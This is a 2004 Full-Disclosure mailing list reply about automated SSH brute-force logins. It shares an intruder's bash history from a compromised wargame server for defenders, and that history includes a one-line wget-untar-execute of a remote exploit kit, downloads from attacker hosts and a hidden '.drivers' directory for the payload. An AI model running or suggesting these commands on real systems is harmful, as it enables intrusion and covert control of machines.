[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Re: Automated SSH login attempts?
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
- From: andrewg@xxxxxxxxxxxxxxxx
- Date: Fri, 30 Jul 2004 06:36:02 -0700
Greetings list,
Accidentially sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @
irc.pulltheplug.com, #social or #vortex).
The .bash_history is as follows:
passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o
It would appear that if they can't get a local root, they'll use the box for
IRCing from.
Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.
Thanks,
Andrew Griffiths
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html